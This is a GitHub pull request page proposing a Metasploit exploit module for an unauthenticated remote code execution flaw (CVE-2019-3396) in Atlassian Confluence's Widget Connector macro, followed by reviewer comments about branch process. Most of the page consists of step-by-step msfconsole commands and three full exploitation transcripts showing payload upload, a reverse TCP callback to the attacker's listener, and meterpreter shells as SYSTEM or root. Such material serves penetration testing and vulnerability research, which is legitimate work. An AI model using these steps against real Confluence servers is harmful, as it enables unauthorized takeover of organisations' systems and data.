Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Atlassian Confluence RCE exploit (CVE-2019-3396) #11711

Closed
wants to merge 9 commits into from

Conversation

Projects
None yet
4 participants
@rrockru
Copy link

rrockru commented Apr 11, 2019

Description

This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.

The vulnerability exists in the Widget Connector Macro which allow inject the "_template" from the outside for some services, such as Youtube, Viddler, DailyMotion, etc.

The module has been tested with on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payload.

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Vulnerable Application

Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.

Verification Steps

List the steps needed to make sure this thing works

  • Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
  • Start msfconsole
  • use exploit/multi/http/confluence_widget_connector
  • set RHOST <IP>
  • set RPORT <PORT>
  • set SRVHOST <HOST_IP>
  • check
  • You should see The target is vulnerable
  • exploit
  • You should get a meterpreter session.

Options

  • TARGETURI: Path to Atlassian Confluence installation ("/" is the default)
  • ListenerTimeout: Time that the Listener will wait for the payload request ("10" is the default)

Scenario

Tested on Confluence 6.8.2 with Windows target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
TARGET => Windows
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Windows 10
[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] Sending stage (179779 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
[*] target.com:8090 - Waiting for exploit to complete...
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

Tested on Confluence 6.8.2 with Java target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload  /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Attempting to execute  /opt/atlassian/confluence/temp/EjpPf.jar
[*] Sending stage (53866 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

Tested on Confluence 6.8.2 with Linux target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
[*] Sending stage (985320 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >
@trenerok

This comment has been minimized.

Copy link

trenerok commented Apr 11, 2019

👍

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 11, 2019

Excellent turnaround time from disclosure to exploit!

@wvu-r7
Copy link
Contributor

wvu-r7 left a comment

Thanks for the submission. This is my first pass of review.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 11, 2019

This PR should come from a topic/feature branch, not master. Please use a topic branch next time. While I don't think it's necessary to close this PR (edit: for technical reasons), someone else might (edit: for process reasons) when they take on this PR. (Please track between PRs if you do.)

rrockru added some commits Apr 11, 2019

rrockru added some commits Apr 11, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Apr 12, 2019

While I don't think it's necessary to close this PR


It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Please resubmit from a unique branch.

@rrockru rrockru referenced this pull request Apr 12, 2019

Open

Atlassian Confluence RCE exploit (CVE-2019-3396) #11717

0 of 10 tasks complete
@rrockru

This comment has been minimized.

Copy link
Author

rrockru commented Apr 12, 2019

Pull request recreated from unique branch: #11717

@bcoles bcoles closed this Apr 12, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 12, 2019

@bcoles: Thanks for that. I have been the chief proponent of that advice for MSF and the reason it's so strongly enforced here. :-)

It is still best practice, and we will continue to strongly recommend it. I was addressing the fact that it's not required for a clean merge if the rest of the process is correct. Additionally, I have informed my team that old diffs are still viewable even if the branch has diverged.

The misconception in the past was that it was technically necessary to close a PR. That is not true. However, it is our process, and we will continue to enforce it.

I'm just a reviewer on this one. (Original comment has been updated.) Thanks!

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Apr 12, 2019

@bcoles: Thanks for that. I have been the chief proponent of that advice for MSF and the reason it's so strongly enforced here. :-)

My reply is copypasta pre-written template, and my motivation is based on observations of doctrine provided by *-r7 members,

I mean, I already have the copypasta reply ready to go. Seems to be a waste not to use it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.